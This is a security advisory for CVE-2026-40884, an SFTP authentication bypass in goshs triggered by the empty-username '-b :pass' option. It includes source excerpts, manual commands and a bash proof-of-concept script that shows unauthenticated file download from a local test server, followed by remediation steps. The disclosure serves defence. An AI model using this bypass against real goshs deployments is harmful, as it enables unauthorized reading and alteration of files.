CVE-2026-40884
CRITICAL
GHSA-c29w-qq4m-2gcv
CVSS VectorNVD
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
DescriptionNVD
Summary
goshs contains an SFTP authentication bypass when the documented empty-username basic-auth syntax is used. If the server is started with -b ':pass' together with -sftp, goshs accepts that configuration but does not install any SFTP password handler. As a result, an unauthenticated network attacker can connect to the SFTP service and access files without a password. I reproduced this on the latest release v2.0.0-beta.5.
Details
The help text explicitly documents empty usernames as valid authentication input:
options/options.go:264-266saysUse basic authentication (user:pass - user can be empty)
The SFTP sanity check only requires that either -b or --sftp-keyfile is present:
if opts.SFTP && (opts.BasicAuth == "" && opts.SFTPKeyFile == "") {
logger.Fatal("When using SFTP you need to either specify an authorized keyfile using -sfk or username and password using -b")
}That parsing logic then splits -b ':pass' into an empty username and a non-empty password:
auth := strings.SplitN(opts.BasicAuth, ":", 2)
opts.Username = auth[0]
opts.Password = auth[1]But the SFTP server only installs a password handler if both the username and password are non-empty:
if s.Username != "" && s.Password != "" {
sshServer.PasswordHandler = func(ctx ssh.Context, password string) bool {
return ctx.User() == s.Username && password == s.Password
}
}With -b ':pass', that condition is false, so no password authentication is enforced for SFTP sessions.
Relevant source locations:
options/options.go:264-266sanity/checks.go:82-85sanity/checks.go:102-109sftpserver/sftpserver.go:82-85
PoC
I manually verified the issue on v2.0.0-beta.5. The server was started with the documented empty-user auth syntax -b ':pass', but an SFTP client still downloaded a file without supplying any key or password.
Manual verification commands used:
Terminal 1
cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
go build -o /tmp/goshs_beta5 ./
rm -rf /tmp/goshs_authless_root /tmp/authless_sftp.txt
mkdir -p /tmp/goshs_authless_root
printf 'root file\n' > /tmp/goshs_authless_root/test.txt
/tmp/goshs_beta5 -p 18102 -sftp -d /tmp/goshs_authless_root --sftp-port 2223 -b ':pass'Terminal 2
printf 'get /tmp/goshs_authless_root/test.txt /tmp/authless_sftp.txt\nbye\n' | \
sftp -o PreferredAuthentications=none,password -o PubkeyAuthentication=no \
-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -P 2223 -b - [email protected]
cat /tmp/authless_sftp.txtExpected result:
- the SFTP session succeeds without a key
- there is no password prompt
cat /tmp/authless_sftp.txtprintsroot file
PoC Video 1:
https://github.com/user-attachments/assets/1ef1539d-bf29-419b-a26e-46aa405effb4
Single-script verification:
'/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc2'gosh_poc2 script content:
#!/usr/bin/env bash
set -euo pipefail
REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5'
BIN='/tmp/goshs_beta5_sftp_empty_user'
ROOT='/tmp/goshs_authless_root'
DOWNLOAD='/tmp/authless_sftp.txt'
HTTP_PORT='18102'
SFTP_PORT='2223'
SERVER_PID=""
cleanup() {
if [[ -n "${SERVER_PID:-}" ]]; then
kill "${SERVER_PID}" >/dev/null 2>&1 || true
wait "${SERVER_PID}" 2>/dev/null || true
fi
}
trap cleanup EXIT
echo '[1/5] Building goshs beta.5'
cd "${REPO}"
go build -o "${BIN}" ./
echo '[2/5] Preparing test root'
rm -rf "${ROOT}" "${DOWNLOAD}"
mkdir -p "${ROOT}"
printf 'root file\n' > "${ROOT}/test.txt"
echo "[3/5] Starting goshs with documented empty-user auth syntax on SFTP ${SFTP_PORT}"
"${BIN}" -p "${HTTP_PORT}" -sftp -d "${ROOT}" --sftp-port "${SFTP_PORT}" -b ':pass' \
>/tmp/gosh_poc2.log 2>&1 &
SERVER_PID=$!
for _ in $(seq 1 40); do
if python3 - <<PY
import socket
s = socket.socket()
try:
s.connect(("127.0.0.1", ${SFTP_PORT}))
raise SystemExit(0)
except OSError:
raise SystemExit(1)
finally:
s.close()
PY
then
break
fi
sleep 0.25
done
echo '[4/5] Connecting without password or key'
printf "get ${ROOT}/test.txt ${DOWNLOAD}\nbye\n" | \
sftp -o PreferredAuthentications=none,password -o PubkeyAuthentication=no \
-o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -P "${SFTP_PORT}" -b - [email protected]
echo '[5/5] Verifying unauthenticated file access'
echo "Downloaded content: $(cat "${DOWNLOAD}")"
if [[ "$(cat "${DOWNLOAD}")" == 'root file' ]]; then
echo '[RESULT] VULNERABLE: empty-user SFTP password auth leaves the server unauthenticated'
else
echo '[RESULT] NOT REPRODUCED'
exit 1
fiPoC Video 2:
https://github.com/user-attachments/assets/b8f632b7-20f4-49f1-b207-b2502af49b77
Impact
This is an authentication bypass in the SFTP service. An external attacker does not need valid credentials to access the exposed SFTP root when the operator follows the documented -b ':pass' syntax. That enables unauthenticated reading, uploading, renaming, and deleting of files within the configured SFTP root, depending on server mode and filesystem permissions.
Remediation
Suggested fixes:
- Install the SFTP password handler whenever a password is configured, even if the username is an empty string.
- If empty usernames are not intended for SFTP, reject
-b ':pass'during option validation whenever-sftpis enabled. - Add an integration test that starts SFTP with
-b ':pass'and verifies that unauthenticated sessions are rejected.
AnalysisAI
goshs contains an SFTP authentication bypass when the documented empty-username basic-auth syntax is used. If the server is started with -b ':pass' together with -sftp, goshs accepts that configuration but does not install any SFTP password handler. …
Sign in for full analysis, threat intelligence, and remediation guidance.
Share
External POC / Exploit Code
Leaving vuln.today